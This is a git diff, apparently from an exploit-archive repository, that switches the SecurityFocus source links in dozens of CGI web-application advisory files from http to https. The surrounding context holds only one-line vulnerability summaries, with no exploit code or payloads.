pngren is prone to a remote arbitrary command execution vulnerability. diff --git a/exploits/cgi/webapps/26017.txt b/exploits/cgi/webapps/26017.txt index 87dc7e7cc..41f3b81d3 100644 --- a/exploits/cgi/webapps/26017.txt +++ b/exploits/cgi/webapps/26017.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14336/info +source: https://www.securityfocus.com/bid/14336/info Greasemonkey is susceptible to multiple remote information disclosure vulnerabilities. These issues are due to a design error allowing insecure JavaScript functions to be executed by remote Web sites. diff --git a/exploits/cgi/webapps/26046.txt b/exploits/cgi/webapps/26046.txt index ccf67565e..08bb50614 100644 --- a/exploits/cgi/webapps/26046.txt +++ b/exploits/cgi/webapps/26046.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14408/info +source: https://www.securityfocus.com/bid/14408/info @Mail is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26066.txt b/exploits/cgi/webapps/26066.txt index 9cf4f5e45..ec666a5b3 100644 --- a/exploits/cgi/webapps/26066.txt +++ b/exploits/cgi/webapps/26066.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14463/info +source: https://www.securityfocus.com/bid/14463/info Karrigell is susceptible to an arbitrary Python command execution vulnerability. This issue is due to a design flaw that allows remote attackers to execute Python commands that they are not intended to have access to. diff --git a/exploits/cgi/webapps/26256.txt b/exploits/cgi/webapps/26256.txt index 44c0238e4..0fd42c581 100644 --- a/exploits/cgi/webapps/26256.txt +++ b/exploits/cgi/webapps/26256.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14828/info +source: https://www.securityfocus.com/bid/14828/info MIVA Merchant 5 is prone to a cross-site scripting vulnerability.This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26289.txt b/exploits/cgi/webapps/26289.txt index 8fe7469aa..9c7f7c7d1 100644 --- a/exploits/cgi/webapps/26289.txt +++ b/exploits/cgi/webapps/26289.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14893/info +source: https://www.securityfocus.com/bid/14893/info Multiple Alkalay.net scripts are prone to arbitrary remote command execution vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26290.txt b/exploits/cgi/webapps/26290.txt index e90096b99..a652d3947 100644 --- a/exploits/cgi/webapps/26290.txt +++ b/exploits/cgi/webapps/26290.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14894/info +source: https://www.securityfocus.com/bid/14894/info PerlDiver is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26344.txt b/exploits/cgi/webapps/26344.txt index b0156e121..d4cc9a873 100644 --- a/exploits/cgi/webapps/26344.txt +++ b/exploits/cgi/webapps/26344.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15083/info +source: https://www.securityfocus.com/bid/15083/info WebGUI is prone to an arbitrary command execution vulnerability. This is due to insufficient sanitization of user-supplied data. diff --git a/exploits/cgi/webapps/26398.txt b/exploits/cgi/webapps/26398.txt index d401cbe78..e198a0f40 100644 --- a/exploits/cgi/webapps/26398.txt +++ b/exploits/cgi/webapps/26398.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15206/info +source: https://www.securityfocus.com/bid/15206/info RSA ACE Agent is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26461.txt b/exploits/cgi/webapps/26461.txt index f05373827..2eb8d4537 100644 --- a/exploits/cgi/webapps/26461.txt +++ b/exploits/cgi/webapps/26461.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15283/info +source: https://www.securityfocus.com/bid/15283/info Simple PHP Blog is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26462.txt b/exploits/cgi/webapps/26462.txt index 593c00d8c..59389d9aa 100644 --- a/exploits/cgi/webapps/26462.txt +++ b/exploits/cgi/webapps/26462.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15283/info +source: https://www.securityfocus.com/bid/15283/info Simple PHP Blog is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26463.txt b/exploits/cgi/webapps/26463.txt index 33f5fc8d1..c4905d0df 100644 --- a/exploits/cgi/webapps/26463.txt +++ b/exploits/cgi/webapps/26463.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15283/info +source: https://www.securityfocus.com/bid/15283/info Simple PHP Blog is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26475.txt b/exploits/cgi/webapps/26475.txt index 16b40d7af..42384038c 100644 --- a/exploits/cgi/webapps/26475.txt +++ b/exploits/cgi/webapps/26475.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15336/info +source: https://www.securityfocus.com/bid/15336/info Asterisk is prone to an unauthorized-access vulnerability. This issue is due to a failure in the application to properly verify user-supplied input. diff --git a/exploits/cgi/webapps/26506.txt b/exploits/cgi/webapps/26506.txt index e36e49a2f..b24a77b96 100644 --- a/exploits/cgi/webapps/26506.txt +++ b/exploits/cgi/webapps/26506.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15419/info +source: https://www.securityfocus.com/bid/15419/info Walla TeleSite is prone to multiple input validation vulnerabilities. These are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/cgi/webapps/26507.txt b/exploits/cgi/webapps/26507.txt index 9807c0834..25186c8d2 100644 --- a/exploits/cgi/webapps/26507.txt +++ b/exploits/cgi/webapps/26507.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15419/info +source: https://www.securityfocus.com/bid/15419/info Walla TeleSite is prone to multiple input validation vulnerabilities. These are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/cgi/webapps/26508.txt b/exploits/cgi/webapps/26508.txt index 684a2904b..fc1d81883 100644 --- a/exploits/cgi/webapps/26508.txt +++ b/exploits/cgi/webapps/26508.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15419/info +source: https://www.securityfocus.com/bid/15419/info Walla TeleSite is prone to multiple input validation vulnerabilities. These are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/cgi/webapps/26509.txt b/exploits/cgi/webapps/26509.txt index 2d7318426..9909fdafc 100644 --- a/exploits/cgi/webapps/26509.txt +++ b/exploits/cgi/webapps/26509.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15419/info +source: https://www.securityfocus.com/bid/15419/info Walla TeleSite is prone to multiple input validation vulnerabilities. These are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/cgi/webapps/26550.txt b/exploits/cgi/webapps/26550.txt index 20ddc634b..6414da255 100644 --- a/exploits/cgi/webapps/26550.txt +++ b/exploits/cgi/webapps/26550.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15537/info +source: https://www.securityfocus.com/bid/15537/info OTRS is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26551.txt b/exploits/cgi/webapps/26551.txt index 6d2155dba..654465f58 100644 --- a/exploits/cgi/webapps/26551.txt +++ b/exploits/cgi/webapps/26551.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15537/info +source: https://www.securityfocus.com/bid/15537/info OTRS is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26552.txt b/exploits/cgi/webapps/26552.txt index 384aac592..f9cc22703 100644 --- a/exploits/cgi/webapps/26552.txt +++ b/exploits/cgi/webapps/26552.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15537/info +source: https://www.securityfocus.com/bid/15537/info OTRS is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26716.txt b/exploits/cgi/webapps/26716.txt index dbcaa2685..172b5ab6b 100644 --- a/exploits/cgi/webapps/26716.txt +++ b/exploits/cgi/webapps/26716.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15705/info +source: https://www.securityfocus.com/bid/15705/info Easy Search System is prone to a cross-site scripting vulnerability. diff --git a/exploits/cgi/webapps/26721.txt b/exploits/cgi/webapps/26721.txt index ab367c752..1236450be 100644 --- a/exploits/cgi/webapps/26721.txt +++ b/exploits/cgi/webapps/26721.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15712/info +source: https://www.securityfocus.com/bid/15712/info 1-Search is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26761.txt b/exploits/cgi/webapps/26761.txt index eec3d7d3d..cef73d292 100644 --- a/exploits/cgi/webapps/26761.txt +++ b/exploits/cgi/webapps/26761.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15770/info +source: https://www.securityfocus.com/bid/15770/info It is possible for remote attackers to gain control of a target TrueMobile 2300 running firmware versions 3.0.0.8 and 5.1.1.6. Other versions are likely affected. The vulnerability appears to be in an administrative component accessed through the web-based control interface. Unauthenticated attackers can force the device to reset the administrative credentials without authorization. Once credentials have been reset an attacker can log in and perform malicious actions, potentially compromising the entire LAN behind the device. diff --git a/exploits/cgi/webapps/26771.txt b/exploits/cgi/webapps/26771.txt index af345086e..5ce78e17a 100644 --- a/exploits/cgi/webapps/26771.txt +++ b/exploits/cgi/webapps/26771.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15798/info +source: https://www.securityfocus.com/bid/15798/info Nortel SSL VPN is prone to an input validation vulnerability. This issue could be exploited to cause arbitrary commands to be executed on a user's computer. Cross-site scripting attacks are also possible. diff --git a/exploits/cgi/webapps/26786.txt b/exploits/cgi/webapps/26786.txt index b0439f201..7cfe75677 100644 --- a/exploits/cgi/webapps/26786.txt +++ b/exploits/cgi/webapps/26786.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15824/info +source: https://www.securityfocus.com/bid/15824/info EveryAuction is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26842.txt b/exploits/cgi/webapps/26842.txt index d1d965269..16b9cd3fd 100644 --- a/exploits/cgi/webapps/26842.txt +++ b/exploits/cgi/webapps/26842.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15883/info +source: https://www.securityfocus.com/bid/15883/info SiteNet BBS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26843.txt b/exploits/cgi/webapps/26843.txt index f7ac5068d..d573d8be4 100644 --- a/exploits/cgi/webapps/26843.txt +++ b/exploits/cgi/webapps/26843.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15883/info +source: https://www.securityfocus.com/bid/15883/info SiteNet BBS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26845.txt b/exploits/cgi/webapps/26845.txt index e534ef819..fd6025358 100644 --- a/exploits/cgi/webapps/26845.txt +++ b/exploits/cgi/webapps/26845.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15886/info +source: https://www.securityfocus.com/bid/15886/info Atlant Pro is prone to cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26846.txt b/exploits/cgi/webapps/26846.txt index bf43d4689..f268fc182 100644 --- a/exploits/cgi/webapps/26846.txt +++ b/exploits/cgi/webapps/26846.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15887/info +source: https://www.securityfocus.com/bid/15887/info AtlantForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26847.txt b/exploits/cgi/webapps/26847.txt index c3295a45c..56a865bfa 100644 --- a/exploits/cgi/webapps/26847.txt +++ b/exploits/cgi/webapps/26847.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15889/info +source: https://www.securityfocus.com/bid/15889/info eDatCat is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26848.txt b/exploits/cgi/webapps/26848.txt index e5467feab..6911b0d9f 100644 --- a/exploits/cgi/webapps/26848.txt +++ b/exploits/cgi/webapps/26848.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15890/info +source: https://www.securityfocus.com/bid/15890/info ECW-Cart is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26849.txt b/exploits/cgi/webapps/26849.txt index ce686e4eb..10546c56e 100644 --- a/exploits/cgi/webapps/26849.txt +++ b/exploits/cgi/webapps/26849.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15891/info +source: https://www.securityfocus.com/bid/15891/info ECTOOLS Onlineshop is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26850.txt b/exploits/cgi/webapps/26850.txt index 382a6a4ee..f31f171b6 100644 --- a/exploits/cgi/webapps/26850.txt +++ b/exploits/cgi/webapps/26850.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15892/info +source: https://www.securityfocus.com/bid/15892/info PPCal Shopping Cart is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26851.txt b/exploits/cgi/webapps/26851.txt index 0e20c8a16..e5ede5419 100644 --- a/exploits/cgi/webapps/26851.txt +++ b/exploits/cgi/webapps/26851.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15896/info +source: https://www.securityfocus.com/bid/15896/info Kryptronic ClickCartPro is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26852.txt b/exploits/cgi/webapps/26852.txt index c856dd3e7..63f51d8fd 100644 --- a/exploits/cgi/webapps/26852.txt +++ b/exploits/cgi/webapps/26852.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15898/info +source: https://www.securityfocus.com/bid/15898/info Dick Copits PDEstore is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26858.txt b/exploits/cgi/webapps/26858.txt index 090f9db0e..b75182602 100644 --- a/exploits/cgi/webapps/26858.txt +++ b/exploits/cgi/webapps/26858.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15913/info +source: https://www.securityfocus.com/bid/15913/info binary board system is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26859.txt b/exploits/cgi/webapps/26859.txt index dc937a9b6..38609c331 100644 --- a/exploits/cgi/webapps/26859.txt +++ b/exploits/cgi/webapps/26859.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15913/info +source: https://www.securityfocus.com/bid/15913/info binary board system is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26860.txt b/exploits/cgi/webapps/26860.txt index fcf8a144c..97b032005 100644 --- a/exploits/cgi/webapps/26860.txt +++ b/exploits/cgi/webapps/26860.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15913/info +source: https://www.securityfocus.com/bid/15913/info binary board system is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26861.txt b/exploits/cgi/webapps/26861.txt index 95299bee9..79f6efc81 100644 --- a/exploits/cgi/webapps/26861.txt +++ b/exploits/cgi/webapps/26861.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15915/info +source: https://www.securityfocus.com/bid/15915/info ScareCrow is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26862.txt b/exploits/cgi/webapps/26862.txt index 981e5e33d..ac7ad42f7 100644 --- a/exploits/cgi/webapps/26862.txt +++ b/exploits/cgi/webapps/26862.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15915/info +source: https://www.securityfocus.com/bid/15915/info ScareCrow is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26863.txt b/exploits/cgi/webapps/26863.txt index ba0c6122b..2fabb97ae 100644 --- a/exploits/cgi/webapps/26863.txt +++ b/exploits/cgi/webapps/26863.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15915/info +source: https://www.securityfocus.com/bid/15915/info ScareCrow is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26864.txt b/exploits/cgi/webapps/26864.txt index a90b6a7a9..ba4d5032d 100644 --- a/exploits/cgi/webapps/26864.txt +++ b/exploits/cgi/webapps/26864.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15916/info +source: https://www.securityfocus.com/bid/15916/info WebGlimpse is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26865.txt b/exploits/cgi/webapps/26865.txt index 9ccf1f4d0..032169266 100644 --- a/exploits/cgi/webapps/26865.txt +++ b/exploits/cgi/webapps/26865.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15917/info +source: https://www.securityfocus.com/bid/15917/info WebCal is prone to multiple HTML injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/cgi/webapps/26914.txt b/exploits/cgi/webapps/26914.txt index 94a596f19..2d92b0137 100644 --- a/exploits/cgi/webapps/26914.txt +++ b/exploits/cgi/webapps/26914.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15974/info +source: https://www.securityfocus.com/bid/15974/info Portfolio Netpublish Server is prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26917.txt b/exploits/cgi/webapps/26917.txt index f19ca4be0..2ec41d005 100644 --- a/exploits/cgi/webapps/26917.txt +++ b/exploits/cgi/webapps/26917.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15990/info +source: https://www.securityfocus.com/bid/15990/info LiveJournal is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/cgi/webapps/26933.txt b/exploits/cgi/webapps/26933.txt index 07a90e696..562aa3605 100644 --- a/exploits/cgi/webapps/26933.txt +++ b/exploits/cgi/webapps/26933.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16011/info +source: https://www.securityfocus.com/bid/16011/info ProjectApp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26937.txt b/exploits/cgi/webapps/26937.txt index d172e7bf2..7f26f622a 100644 --- a/exploits/cgi/webapps/26937.txt +++ b/exploits/cgi/webapps/26937.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16013/info +source: https://www.securityfocus.com/bid/16013/info ComputerOil Redakto CMS is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27021.txt b/exploits/cgi/webapps/27021.txt index efceb8ac0..8c725109e 100644 --- a/exploits/cgi/webapps/27021.txt +++ b/exploits/cgi/webapps/27021.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16119/info +source: https://www.securityfocus.com/bid/16119/info DiscusWare Discus is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27061.txt b/exploits/cgi/webapps/27061.txt index 2f9f144b5..a796ce274 100644 --- a/exploits/cgi/webapps/27061.txt +++ b/exploits/cgi/webapps/27061.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16195/info +source: https://www.securityfocus.com/bid/16195/info Hummingbird Enterprise Collaboration is prone to multiple vulnerabilities. diff --git a/exploits/cgi/webapps/27062.txt b/exploits/cgi/webapps/27062.txt index ac5bc90bf..f1b60d323 100644 --- a/exploits/cgi/webapps/27062.txt +++ b/exploits/cgi/webapps/27062.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16195/info +source: https://www.securityfocus.com/bid/16195/info Hummingbird Enterprise Collaboration is prone to multiple vulnerabilities. diff --git a/exploits/cgi/webapps/27081.txt b/exploits/cgi/webapps/27081.txt index 947927e8c..2e4a4f4cb 100644 --- a/exploits/cgi/webapps/27081.txt +++ b/exploits/cgi/webapps/27081.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16239/info +source: https://www.securityfocus.com/bid/16239/info Ultimate Auction is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27088.txt b/exploits/cgi/webapps/27088.txt index 77cbf2e67..dc7e1943e 100644 --- a/exploits/cgi/webapps/27088.txt +++ b/exploits/cgi/webapps/27088.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16251/info +source: https://www.securityfocus.com/bid/16251/info Faq-O-Matic is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27091.txt b/exploits/cgi/webapps/27091.txt index e95128a06..d28ee8ab7 100644 --- a/exploits/cgi/webapps/27091.txt +++ b/exploits/cgi/webapps/27091.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16254/info +source: https://www.securityfocus.com/bid/16254/info Ultimate Auction is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27115.txt b/exploits/cgi/webapps/27115.txt index 51c0fd0ef..b976c156f 100644 --- a/exploits/cgi/webapps/27115.txt +++ b/exploits/cgi/webapps/27115.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16330/info +source: https://www.securityfocus.com/bid/16330/info MailSite is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27141.txt b/exploits/cgi/webapps/27141.txt index 31a8f0592..54c03880d 100644 --- a/exploits/cgi/webapps/27141.txt +++ b/exploits/cgi/webapps/27141.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16401/info +source: https://www.securityfocus.com/bid/16401/info Face Control is prone to multiple directory-traversal vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27163.txt b/exploits/cgi/webapps/27163.txt index 113d7159a..63782a519 100644 --- a/exploits/cgi/webapps/27163.txt +++ b/exploits/cgi/webapps/27163.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16494/info +source: https://www.securityfocus.com/bid/16494/info Tivoli Access Manager Plugin for Web Servers is prone to a directory-traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27451.txt b/exploits/cgi/webapps/27451.txt index 3c3eb8a05..702ea3422 100644 --- a/exploits/cgi/webapps/27451.txt +++ b/exploits/cgi/webapps/27451.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17170/info +source: https://www.securityfocus.com/bid/17170/info MPKI 6.0 is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27464.txt b/exploits/cgi/webapps/27464.txt index 0fe6b8a5d..6791f7004 100644 --- a/exploits/cgi/webapps/27464.txt +++ b/exploits/cgi/webapps/27464.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17224/info +source: https://www.securityfocus.com/bid/17224/info MySQL Based Message Board is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/cgi/webapps/27488.txt b/exploits/cgi/webapps/27488.txt index 6a6b5f7c1..d07d64349 100644 --- a/exploits/cgi/webapps/27488.txt +++ b/exploits/cgi/webapps/27488.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17265/info +source: https://www.securityfocus.com/bid/17265/info BlankOL is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27561.txt b/exploits/cgi/webapps/27561.txt index 17ed7704a..9e24a4933 100644 --- a/exploits/cgi/webapps/27561.txt +++ b/exploits/cgi/webapps/27561.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17359/info +source: https://www.securityfocus.com/bid/17359/info Web-App.Org and Web-App.Net are prone to multiple cross-site scripting vulnerabilities because the applications fail to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27562.txt b/exploits/cgi/webapps/27562.txt index 9a904db9d..745c5c091 100644 --- a/exploits/cgi/webapps/27562.txt +++ b/exploits/cgi/webapps/27562.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17359/info +source: https://www.securityfocus.com/bid/17359/info Web-App.Org and Web-App.Net are prone to multiple cross-site scripting vulnerabilities because the applications fail to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27583.txt b/exploits/cgi/webapps/27583.txt index f84ed6bae..03a55c328 100644 --- a/exploits/cgi/webapps/27583.txt +++ b/exploits/cgi/webapps/27583.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17418/info +source: https://www.securityfocus.com/bid/17418/info Web+ Shop is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27594.txt b/exploits/cgi/webapps/27594.txt index 7684ef5e3..77a1a6584 100644 --- a/exploits/cgi/webapps/27594.txt +++ b/exploits/cgi/webapps/27594.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17438/info +source: https://www.securityfocus.com/bid/17438/info Guestbook is prone to multiple HTML-injection vulnerabilities; the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/cgi/webapps/27620.txt b/exploits/cgi/webapps/27620.txt index 74975d2d7..b0ab87802 100644 --- a/exploits/cgi/webapps/27620.txt +++ b/exploits/cgi/webapps/27620.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17452/info +source: https://www.securityfocus.com/bid/17452/info Microsoft FrontPage Server Extensions are prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before it is rendered to other users. diff --git a/exploits/cgi/webapps/27631.txt b/exploits/cgi/webapps/27631.txt index 5425fe18c..772a45455 100644 --- a/exploits/cgi/webapps/27631.txt +++ b/exploits/cgi/webapps/27631.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17485/info +source: https://www.securityfocus.com/bid/17485/info interaktiv.shop is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27672.txt b/exploits/cgi/webapps/27672.txt index 586261eed..7c9bf581f 100644 --- a/exploits/cgi/webapps/27672.txt +++ b/exploits/cgi/webapps/27672.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17584/info +source: https://www.securityfocus.com/bid/17584/info The axoverzicht.cgi script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27679.txt b/exploits/cgi/webapps/27679.txt index 8b0e60f01..adff8bc4e 100644 --- a/exploits/cgi/webapps/27679.txt +++ b/exploits/cgi/webapps/27679.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17598/info +source: https://www.securityfocus.com/bid/17598/info Visale is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27680.txt b/exploits/cgi/webapps/27680.txt index fd15751a7..94c605346 100644 --- a/exploits/cgi/webapps/27680.txt +++ b/exploits/cgi/webapps/27680.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17598/info +source: https://www.securityfocus.com/bid/17598/info Visale is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27681.txt b/exploits/cgi/webapps/27681.txt index dd23e7c07..f0ba545d4 100644 --- a/exploits/cgi/webapps/27681.txt +++ b/exploits/cgi/webapps/27681.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17598/info +source: https://www.securityfocus.com/bid/17598/info Visale is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27682.txt b/exploits/cgi/webapps/27682.txt index 1ab0b8490..8e1e37450 100644 --- a/exploits/cgi/webapps/27682.txt +++ b/exploits/cgi/webapps/27682.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17602/info +source: https://www.securityfocus.com/bid/17602/info CommuniMail is prone to 